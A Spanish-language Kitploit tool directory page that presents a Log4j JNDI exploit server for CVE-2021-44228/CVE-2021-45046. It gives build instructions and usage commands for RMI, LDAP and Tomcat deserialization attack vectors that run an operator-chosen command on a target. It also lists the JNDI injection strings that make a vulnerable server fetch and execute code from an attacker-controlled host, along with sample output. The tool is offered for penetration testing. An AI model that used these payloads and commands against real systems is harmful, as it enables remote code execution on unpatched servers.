Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Log4j-JNDIServer — Este proyecto ayudará a probar la vulnerabilidad Log4j CVE-2021-44228. | Kitploit
Herramientas/GitHubGitHub/immunityinc/log4j-jndiserver
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebComando y ControlHerramienta de Acceso Remoto
GitHubimmunityinc/log4j-jndiserver

Log4j-JNDIServer

Este proyecto ayudará a probar la vulnerabilidad Log4j CVE-2021-44228.

Ver Repositorio
92hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Log4j-JNDIServer

Este proyecto ayudará a probar las vulnerabilidades Log4j CVE-2021-44228/CVE-2021-45046.

Instalación y Compilación

  • Cargue el proyecto en Intellij Idea
  • Seleccione JDK en "Projects Settings" (CTRL + ALT + SHIFT + S)
  • En "Project Settings", cree el Artifact -> "Artifacts" -> "Create JAR from Modules" -> En "JAR files from libraries", marque "extract to target JAR" -> "OK"
  • Compile el proyecto (CTRL + F9). Esto creará el archivo jar en la carpeta /out/artifacts/

Compilación con Maven

Requiere Java 1.8+ y Maven 3.x+

  • mvn clean package -DskipTests
  • Encontrará el archivo .jar en la carpeta /target

Usos

1.RMI Vector de Ataque

java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 1 <RMI_IP> <RMI_PORT> <HTTP_PORT> <COMMAND>

Ya no necesita alojar el archivo Exploit.class. La aplicación iniciará un servidor HTTP en el puerto indicado.

Debe indicar el comando que desea ejecutar en el objetivo.

Injection: {jndi:rmi://<RMI_IP>:<RMI_PORT>/Foo}

2.LDAP Vector de Ataque

java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 2 <LDAP_IP> <LDAP_PORT> <HTTP_PORT> <COMMAND>

Ya no necesita alojar el archivo Exploit.class. La aplicación iniciará un servidor HTTP en el puerto indicado.

Debe indicar el comando que desea ejecutar en el objetivo.

Injection: {jndi:ldap://<LDAP_IP>:<LDAP_PORT>/Exploit}

3.Vector de Ataque de Deserialización (Usando payload de Tomcat)

java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 3 <RMI_IP> <RMI_PORT> <COMMAND>

Injection: {jndi:rmi://<RMI_IP>:<RMI_PORT>/Foo}

Ejemplo

root@kitploit:~
$ java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 3 127.0.0.1 1389 /usr/bin/gnome-calculator
- Starting RMI Server for Tomcat  -
- Creating RMI Server on port 1389 -
- Reference bound! -
- RMI server started at 127.0.0.1:1389 -
- Log4J Injection Path: ${jndi:rmi://127.0.0.1:1389/Foo} -
Descargar herramienta